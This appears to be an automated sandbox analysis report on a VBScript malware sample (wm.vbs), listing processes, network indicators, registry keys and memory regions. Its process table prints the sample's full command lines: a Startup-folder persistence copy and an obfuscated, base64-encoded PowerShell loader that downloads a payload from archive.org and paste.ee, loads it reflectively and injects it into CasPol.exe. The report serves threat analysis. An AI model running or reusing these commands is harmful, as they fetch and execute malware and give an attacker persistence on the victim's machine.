Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
wm.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gs4dr5x.1ht.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdqc2dde.23y.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzir100f.000.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hvt5xcbe.zaw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4m4ivmb.eje.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlwxi0ma.lev.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\wm.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs',
'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping 127.0.0.1 -n 10
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -command [System.IO.File]::Copy('C:\Windows\system32\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\ sbv.navircse.vbs')')
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent
'+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t
='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e
'+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll,
[obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1}
, {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/Sk1Jg/0
|
188.114.96.3
|
|
|
|
135.224.23.113
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ia600100.us.arX
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.microsofth
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://ia600100.us.archive.org
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.96.3
|
|
|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
135.224.23.113
|
unknown
|
United States
|
|
|
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1690060E000
|
trusted library allocation
|
page read and write
|
|
|
|
1697BE10000
|
trusted library section
|
page read and write
|
|
|
|
3531000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
1691061B000
|
trusted library allocation
|
page read and write
|
|
|
|
23B00145000
|
trusted library allocation
|
page read and write
|
||
|
18C0697C000
|
heap
|
page read and write
|
||
|
12B0000
|
trusted library allocation
|
page read and write
|
||
|
1697BAD2000
|
heap
|
page read and write
|
||
|
7FF886D02000
|
trusted library allocation
|
page read and write
|
||
|
18C087A0000
|
heap
|
page read and write
|
||
|
18C06A27000
|
heap
|
page read and write
|
||
|
18C088E8000
|
heap
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
16901BA9000
|
trusted library allocation
|
page read and write
|
||
|
4539000
|
trusted library allocation
|
page read and write
|
||
|
18C088DD000
|
heap
|
page read and write
|
||
|
169016C0000
|
trusted library allocation
|
page read and write
|
||
|
1630000
|
heap
|
page read and write
|
||
|
7FF886B23000
|
trusted library allocation
|
page execute and read and write
|
||
|
18C088A9000
|
heap
|
page read and write
|
||
|
18C088FD000
|
heap
|
page read and write
|
||
|
18C06A24000
|
heap
|
page read and write
|
||
|
23B72480000
|
trusted library allocation
|
page read and write
|
||
|
1430000
|
heap
|
page read and write
|
||
|
7FF8879B0000
|
trusted library allocation
|
page read and write
|
||
|
56F0000
|
heap
|
page read and write
|
||
|
1690168B000
|
trusted library allocation
|
page read and write
|
||
|
CC3A7E000
|
stack
|
page read and write
|
||
|
1618054E000
|
trusted library allocation
|
page read and write
|
||
|
18C08A2C000
|
heap
|
page read and write
|
||
|
7FF887BC0000
|
trusted library allocation
|
page read and write
|
||
|
18C08A48000
|
heap
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
13B0000
|
trusted library allocation
|
page read and write
|
||
|
18C08A28000
|
heap
|
page read and write
|
||
|
18C08BA1000
|
heap
|
page read and write
|
||
|
117E000
|
heap
|
page read and write
|
||
|
7FF8879B6000
|
trusted library allocation
|
page read and write
|
||
|
68D4000
|
trusted library allocation
|
page read and write
|
||
|
18C087D7000
|
heap
|
page read and write
|
||
|
16180121000
|
trusted library allocation
|
page read and write
|
||
|
18C088A0000
|
heap
|
page read and write
|
||
|
1697BAB4000
|
heap
|
page read and write
|
||
|
18C08450000
|
heap
|
page read and write
|
||
|
23B73E40000
|
heap
|
page read and write
|
||
|
161F23D5000
|
heap
|
page read and write
|
||
|
556E000
|
stack
|
page read and write
|
||
|
161F2136000
|
heap
|
page read and write
|
||
|
1181000
|
heap
|
page read and write
|
||
|
142E000
|
stack
|
page read and write
|
||
|
1618015D000
|
trusted library allocation
|
page read and write
|
||
|
18C0890D000
|
heap
|
page read and write
|
||
|
7FF887B60000
|
trusted library allocation
|
page read and write
|
||
|
1618062A000
|
trusted library allocation
|
page read and write
|
||
|
18C087F2000
|
heap
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
1697B550000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
169015F0000
|
trusted library allocation
|
page read and write
|
||
|
18C06A27000
|
heap
|
page read and write
|
||
|
18C088ED000
|
heap
|
page read and write
|
||
|
1697B94B000
|
heap
|
page read and write
|
||
|
12C5000
|
heap
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
18C087B7000
|
heap
|
page read and write
|
||
|
5DE0000
|
trusted library allocation
|
page read and write
|
||
|
16900404000
|
trusted library allocation
|
page read and write
|
||
|
18C08B49000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
13E0000
|
trusted library allocation
|
page read and write
|
||
|
16180158000
|
trusted library allocation
|
page read and write
|
||
|
7FF88790D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1697B890000
|
heap
|
page read and write
|
||
|
1618038B000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AB1000
|
trusted library allocation
|
page read and write
|
||
|
18C08A49000
|
heap
|
page read and write
|
||
|
18C08C5F000
|
heap
|
page read and write
|
||
|
13CB000
|
trusted library allocation
|
page execute and read and write
|
||
|
59D9000
|
stack
|
page read and write
|
||
|
23B74530000
|
heap
|
page execute and read and write
|
||
|
7FF887C93000
|
trusted library allocation
|
page read and write
|
||
|
CC3CFE000
|
stack
|
page read and write
|
||
|
7FF887C71000
|
trusted library allocation
|
page read and write
|
||
|
18C06A33000
|
heap
|
page read and write
|
||
|
640E000
|
stack
|
page read and write
|
||
|
7FF887B20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
18C08807000
|
heap
|
page read and write
|
||
|
7FF886B22000
|
trusted library allocation
|
page read and write
|
||
|
161F4229000
|
heap
|
page read and write
|
||
|
7FF887B60000
|
trusted library allocation
|
page read and write
|
||
|
16180500000
|
trusted library allocation
|
page read and write
|
||
|
161F212A000
|
heap
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
23B73F36000
|
heap
|
page read and write
|
||
|
18C06A2F000
|
heap
|
page read and write
|
||
|
23B74A30000
|
heap
|
page read and write
|
||
|
7FF8879E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
58B9000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B30000
|
trusted library allocation
|
page read and write
|
||
|
16979890000
|
heap
|
page read and write
|
||
|
7FF887B40000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
CC3DF7000
|
stack
|
page read and write
|
||
|
7FF8879B0000
|
trusted library allocation
|
page read and write
|
||
|
1697B1C0000
|
heap
|
page read and write
|
||
|
23B73F30000
|
heap
|
page read and write
|
||
|
169798D5000
|
heap
|
page read and write
|
||
|
161F22E0000
|
heap
|
page readonly
|
||
|
18C06970000
|
heap
|
page read and write
|
||
|
A627C7E000
|
stack
|
page read and write
|
||
|
4531000
|
trusted library allocation
|
page read and write
|
||
|
23B73E7F000
|
heap
|
page read and write
|
||
|
161F22D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B24000
|
trusted library allocation
|
page read and write
|
||
|
5ADE000
|
stack
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
CC3EFC000
|
stack
|
page read and write
|
||
|
6905000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AE2000
|
trusted library allocation
|
page read and write
|
||
|
23B72460000
|
trusted library allocation
|
page read and write
|
||
|
68E0000
|
trusted library allocation
|
page read and write
|
||
|
18C08A36000
|
heap
|
page read and write
|
||
|
7FF887BB0000
|
trusted library allocation
|
page read and write
|
||
|
161F41F3000
|
heap
|
page read and write
|
||
|
16979900000
|
heap
|
page read and write
|
||
|
169018CF000
|
trusted library allocation
|
page read and write
|
||
|
59A75FE000
|
stack
|
page read and write
|
||
|
CC373E000
|
stack
|
page read and write
|
||
|
5E00000
|
heap
|
page read and write
|
||
|
23B724ED000
|
heap
|
page read and write
|
||
|
630C000
|
stack
|
page read and write
|
||
|
16901C73000
|
trusted library allocation
|
page read and write
|
||
|
169018A3000
|
trusted library allocation
|
page read and write
|
||
|
7FF887ABA000
|
trusted library allocation
|
page read and write
|
||
|
161F4070000
|
heap
|
page read and write
|
||
|
18C06A33000
|
heap
|
page read and write
|
||
|
1148000
|
heap
|
page read and write
|
||
|
55AE000
|
stack
|
page read and write
|
||
|
23B00089000
|
trusted library allocation
|
page read and write
|
||
|
1697BA90000
|
heap
|
page read and write
|
||
|
CC3FFE000
|
stack
|
page read and write
|
||
|
5E4C000
|
stack
|
page read and write
|
||
|
18C08817000
|
heap
|
page read and write
|
||
|
23B00062000
|
trusted library allocation
|
page read and write
|
||
|
23B000F4000
|
trusted library allocation
|
page read and write
|
||
|
57FD000
|
stack
|
page read and write
|
||
|
16900224000
|
trusted library allocation
|
page read and write
|
||
|
61CC000
|
stack
|
page read and write
|
||
|
18C08B83000
|
heap
|
page read and write
|
||
|
5DD0000
|
trusted library allocation
|
page read and write
|
||
|
1618011B000
|
trusted library allocation
|
page read and write
|
||
|
2797C7D000
|
stack
|
page read and write
|
||
|
23B000FA000
|
trusted library allocation
|
page read and write
|
||
|
18C08A5B000
|
heap
|
page read and write
|
||
|
1697993E000
|
heap
|
page read and write
|
||
|
301C000
|
stack
|
page read and write
|
||
|
169798D0000
|
heap
|
page read and write
|
||
|
18C0881D000
|
heap
|
page read and write
|
||
|
18C087C7000
|
heap
|
page read and write
|
||
|
279759E000
|
stack
|
page read and write
|
||
|
18C087A7000
|
heap
|
page read and write
|
||
|
18C06A2B000
|
heap
|
page read and write
|
||
|
7FF887910000
|
trusted library allocation
|
page read and write
|
||
|
CC417B000
|
stack
|
page read and write
|
||
|
7FF886CD1000
|
trusted library allocation
|
page read and write
|
||
|
7FF887ABA000
|
trusted library allocation
|
page read and write
|
||
|
7FF8879B6000
|
trusted library allocation
|
page read and write
|
||
|
23B0010C000
|
trusted library allocation
|
page read and write
|
||
|
23B72680000
|
heap
|
page read and write
|
||
|
7FF887C88000
|
trusted library allocation
|
page read and write
|
||
|
23B72440000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
18C08908000
|
heap
|
page read and write
|
||
|
18C08A5B000
|
heap
|
page read and write
|
||
|
18C0696C000
|
heap
|
page read and write
|
||
|
7FF887C30000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B12000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B70000
|
trusted library allocation
|
page read and write
|
||
|
7FF887900000
|
trusted library allocation
|
page read and write
|
||
|
23B0010F000
|
trusted library allocation
|
page read and write
|
||
|
58AE000
|
trusted library allocation
|
page read and write
|
||
|
5BDE000
|
stack
|
page read and write
|
||
|
18C087E2000
|
heap
|
page read and write
|
||
|
16901679000
|
trusted library allocation
|
page read and write
|
||
|
18C087D2000
|
heap
|
page read and write
|
||
|
16180113000
|
trusted library allocation
|
page read and write
|
||
|
13A3000
|
trusted library allocation
|
page read and write
|
||
|
58C0000
|
heap
|
page read and write
|
||
|
23B00001000
|
trusted library allocation
|
page read and write
|
||
|
7FF887C20000
|
trusted library allocation
|
page read and write
|
||
|
23B0014E000
|
trusted library allocation
|
page read and write
|
||
|
7FF887903000
|
trusted library allocation
|
page execute and read and write
|
||
|
1550000
|
heap
|
page read and write
|
||
|
1697B510000
|
trusted library allocation
|
page read and write
|
||
|
23B72470000
|
heap
|
page readonly
|
||
|
23B74700000
|
heap
|
page execute and read and write
|
||
|
279787E000
|
stack
|
page read and write
|
||
|
A62787F000
|
stack
|
page read and write
|
||
|
11F2000
|
heap
|
page read and write
|
||
|
23B72514000
|
heap
|
page read and write
|
||
|
18C06A2B000
|
heap
|
page read and write
|
||
|
644E000
|
stack
|
page read and write
|
||
|
23B73E33000
|
heap
|
page read and write
|
||
|
18C0881C000
|
heap
|
page read and write
|
||
|
18C0892A000
|
heap
|
page read and write
|
||
|
23B10071000
|
trusted library allocation
|
page read and write
|
||
|
18C08B87000
|
heap
|
page read and write
|
||
|
23B72576000
|
heap
|
page read and write
|
||
|
161F2030000
|
heap
|
page read and write
|
||
|
CC3AFE000
|
stack
|
page read and write
|
||
|
16190010000
|
trusted library allocation
|
page read and write
|
||
|
1697BAF2000
|
heap
|
page read and write
|
||
|
7FF887BE0000
|
trusted library allocation
|
page read and write
|
||
|
161F20A9000
|
heap
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18C06971000
|
heap
|
page read and write
|
||
|
23B0052D000
|
trusted library allocation
|
page read and write
|
||
|
16180069000
|
trusted library allocation
|
page read and write
|
||
|
169005E8000
|
trusted library allocation
|
page read and write
|
||
|
1697B96A000
|
heap
|
page read and write
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
18C088A1000
|
heap
|
page read and write
|
||
|
7FF887AB4000
|
trusted library allocation
|
page read and write
|
||
|
18C06A26000
|
heap
|
page read and write
|
||
|
18C08B48000
|
heap
|
page read and write
|
||
|
18C087A4000
|
heap
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
1697B590000
|
trusted library allocation
|
page read and write
|
||
|
18C0696D000
|
heap
|
page read and write
|
||
|
16910072000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B743A0000
|
heap
|
page read and write
|
||
|
18C06976000
|
heap
|
page read and write
|
||
|
23B000F7000
|
trusted library allocation
|
page read and write
|
||
|
18C0891D000
|
heap
|
page read and write
|
||
|
18C08C5F000
|
heap
|
page read and write
|
||
|
A627322000
|
stack
|
page read and write
|
||
|
7FF886C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
18C0892A000
|
heap
|
page read and write
|
||
|
18C088CD000
|
heap
|
page read and write
|
||
|
11C3000
|
heap
|
page read and write
|
||
|
23B0003B000
|
trusted library allocation
|
page read and write
|
||
|
18C08A39000
|
heap
|
page read and write
|
||
|
18C08A2E000
|
heap
|
page read and write
|
||
|
7FF886CF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887C50000
|
trusted library allocation
|
page read and write
|
||
|
161F22F0000
|
trusted library allocation
|
page read and write
|
||
|
18C08A32000
|
heap
|
page read and write
|
||
|
23B724CD000
|
heap
|
page read and write
|
||
|
59A70FE000
|
stack
|
page read and write
|
||
|
18C08BA0000
|
heap
|
page read and write
|
||
|
18C08A29000
|
heap
|
page read and write
|
||
|
12B4000
|
trusted library allocation
|
page read and write
|
||
|
59A73FE000
|
stack
|
page read and write
|
||
|
18C06A60000
|
heap
|
page read and write
|
||
|
23B723C0000
|
heap
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
169102FB000
|
trusted library allocation
|
page read and write
|
||
|
2797AF9000
|
stack
|
page read and write
|
||
|
169003DD000
|
trusted library allocation
|
page read and write
|
||
|
18C0881D000
|
heap
|
page read and write
|
||
|
18C0892A000
|
heap
|
page read and write
|
||
|
23B00606000
|
trusted library allocation
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
161F4290000
|
heap
|
page read and write
|
||
|
7FF887AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
18C0891B000
|
heap
|
page read and write
|
||
|
7FF887C00000
|
trusted library allocation
|
page read and write
|
||
|
23B73E35000
|
heap
|
page read and write
|
||
|
7FF887904000
|
trusted library allocation
|
page read and write
|
||
|
CC3E79000
|
stack
|
page read and write
|
||
|
18C08B87000
|
heap
|
page read and write
|
||
|
23B10001000
|
trusted library allocation
|
page read and write
|
||
|
169003CE000
|
trusted library allocation
|
page read and write
|
||
|
23B73E81000
|
heap
|
page read and write
|
||
|
18C08AA0000
|
heap
|
page read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page read and write
|
||
|
161F4680000
|
heap
|
page read and write
|
||
|
161F20E8000
|
heap
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
161F4160000
|
heap
|
page execute and read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
169003C4000
|
trusted library allocation
|
page read and write
|
||
|
A627BFE000
|
stack
|
page read and write
|
||
|
23B10011000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
16910001000
|
trusted library allocation
|
page read and write
|
||
|
16190072000
|
trusted library allocation
|
page read and write
|
||
|
1691101B000
|
trusted library allocation
|
page read and write
|
||
|
1618011E000
|
trusted library allocation
|
page read and write
|
||
|
1697B5C0000
|
trusted library allocation
|
page read and write
|
||
|
279797F000
|
stack
|
page read and write
|
||
|
18C0881D000
|
heap
|
page read and write
|
||
|
16910011000
|
trusted library allocation
|
page read and write
|
||
|
7FF887902000
|
trusted library allocation
|
page read and write
|
||
|
18C08B4F000
|
heap
|
page read and write
|
||
|
18C088C8000
|
heap
|
page read and write
|
||
|
7FF887903000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
1697B530000
|
trusted library allocation
|
page read and write
|
||
|
CC37BE000
|
stack
|
page read and write
|
||
|
7FF887BA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8879C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1697B6A0000
|
heap
|
page read and write
|
||
|
A6277FF000
|
stack
|
page read and write
|
||
|
161F2128000
|
heap
|
page read and write
|
||
|
7FF886E70000
|
trusted library allocation
|
page read and write
|
||
|
7FF887C84000
|
trusted library allocation
|
page read and write
|
||
|
18C08A2B000
|
heap
|
page read and write
|
||
|
7FF887B90000
|
trusted library allocation
|
page read and write
|
||
|
18C087EB000
|
heap
|
page read and write
|
||
|
13B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
13C0000
|
trusted library allocation
|
page read and write
|
||
|
169799E9000
|
heap
|
page read and write
|
||
|
18C08B4B000
|
heap
|
page read and write
|
||
|
18C06A23000
|
heap
|
page read and write
|
||
|
1690007D000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B00000
|
trusted library allocation
|
page read and write
|
||
|
18C08AA1000
|
heap
|
page read and write
|
||
|
23B724D5000
|
heap
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
18C069FD000
|
heap
|
page read and write
|
||
|
18C069FD000
|
heap
|
page read and write
|
||
|
12B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
23B74560000
|
heap
|
page read and write
|
||
|
16979912000
|
heap
|
page read and write
|
||
|
1618009B000
|
trusted library allocation
|
page read and write
|
||
|
161804A3000
|
trusted library allocation
|
page read and write
|
||
|
7FF887AA0000
|
trusted library allocation
|
page read and write
|
||
|
161F4040000
|
heap
|
page execute and read and write
|
||
|
23B004C3000
|
trusted library allocation
|
page read and write
|
||
|
654B000
|
stack
|
page read and write
|
||
|
18C088B1000
|
heap
|
page read and write
|
||
|
2797B77000
|
stack
|
page read and write
|
||
|
18C08916000
|
heap
|
page read and write
|
||
|
7FF886CDA000
|
trusted library allocation
|
page read and write
|
||
|
7FF887BA0000
|
trusted library allocation
|
page read and write
|
||
|
27975DE000
|
stack
|
page read and write
|
||
|
18C06940000
|
heap
|
page read and write
|
||
|
5F8D000
|
stack
|
page read and write
|
||
|
23B72490000
|
heap
|
page read and write
|
||
|
18C0892A000
|
heap
|
page read and write
|
||
|
18C087F2000
|
heap
|
page read and write
|
||
|
7FF887C90000
|
trusted library allocation
|
page read and write
|
||
|
18C08A2A000
|
heap
|
page read and write
|
||
|
7FF887BD0000
|
trusted library allocation
|
page read and write
|
||
|
1697B860000
|
heap
|
page execute and read and write
|
||
|
